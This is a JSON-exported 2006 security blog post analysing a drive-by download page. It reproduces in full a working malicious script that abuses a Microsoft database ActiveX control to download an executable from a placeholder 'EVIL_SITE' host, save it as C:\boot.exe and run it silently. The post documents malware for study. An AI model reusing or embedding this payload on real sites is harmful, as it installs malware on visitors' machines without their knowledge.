{"id":176,"date":"2006-12-24T09:41:10","date_gmt":"2006-12-24T13:41:10","guid":{"rendered":"http:\/\/blogs.law.harvard.edu\/zeroday\/2006\/12\/24\/another-variation-of-drive-by-downloa"},"modified":"2006-12-24T09:41:10","modified_gmt":"2006-12-24T13:41:10","slug":"another-variation-of-drive-by-downloaders","status":"publish","type":"post","link":"https:\/\/archive.blogs.harvard.edu\/zeroday\/2006\/12\/24\/another-variation-of-drive-by-downloaders\/","title":{"rendered":"another variation of drive by downloaders"},"content":{"rendered":"

The exploit <\/a> used is fairly old. One other important thing to note is that the CLSID used here is a Microsoft database control<\/a>. <\/p>\n

[zero@day testing]$ curl http:\/\/EVIL_SITE\/db\/wm.htm
\n<script>
\nvar url,path;
\nurl=\"http:\/\/EVIL_SITE\/mc\/game\/db.exe\";
\npath=\"C:\\\\boot.exe\";
\ntry{
\n var ado=(document.createElement(\"object\"));
\n var d=1;
\n ado.setAttribute(\"classid\",\"clsid:BD96C556-65A3-11D0-983A-00C04FC29E36\");
\n var e=1;
\n var xml=ado.CreateObject(\"Microsoft.XMLHTTP\",\"\");
\n var f=1;
\n var ab=\"Adodb.\";
\n var cd=\"Stream\";
\n var g=1;
\n var as=ado.createobject(ab+cd,\"\");
\n var h=1;
\n xml.Open(\"GET\",url,0);
\n xml.Send();
\n as.type=1;
\n var n=1;
\n as.open();
\n as.write(xml.responseBody);
\n as.savetofile(path,2);
\n as.close();
\n var shell=ado.createobject(\"Shell.Application\",\"\");
\n shell.ShellExecute(path,\"\",\"\",\"open\",0);
\n}
\ncatch(e){}
\n;<\/script><\/code><\/p>\n","protected":false},"excerpt":{"rendered":"

The exploit used is fairly old. One other important thing to note is that the CLSID used here is a Microsoft database control. [zero@day testing]$ curl http:\/\/EVIL_SITE\/db\/wm.htm <script> var url,path; url=”http:\/\/EVIL_SITE\/mc\/game\/db.exe”; path=”C:\\\\boot.exe”; try{ var ado=(document.createElement(“object”)); var d=1; ado.setAttribute(“classid”,”clsid:BD96C556-65A3-11D0-983A-00C04FC29E36″); var e=1; var xml=ado.CreateObject(“Microsoft.XMLHTTP”,””); var f=1; var ab=”Adodb.”; var cd=”Stream”; var g=1; var as=ado.createobject(ab+cd,””); var h=1; xml.Open(“GET”,url,0); […]<\/p>\n","protected":false},"author":214,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[272,275],"tags":[],"class_list":["post-176","post","type-post","status-publish","format-standard","hentry","category-digital-warfare","category-vulnerabilities"],"jetpack_featured_media_url":"","_links":{"self":[{"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/posts\/176","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/users\/214"}],"replies":[{"embeddable":true,"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/comments?post=176"}],"version-history":[{"count":0,"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/posts\/176\/revisions"}],"wp:attachment":[{"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/media?parent=176"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/categories?post=176"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/tags?post=176"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}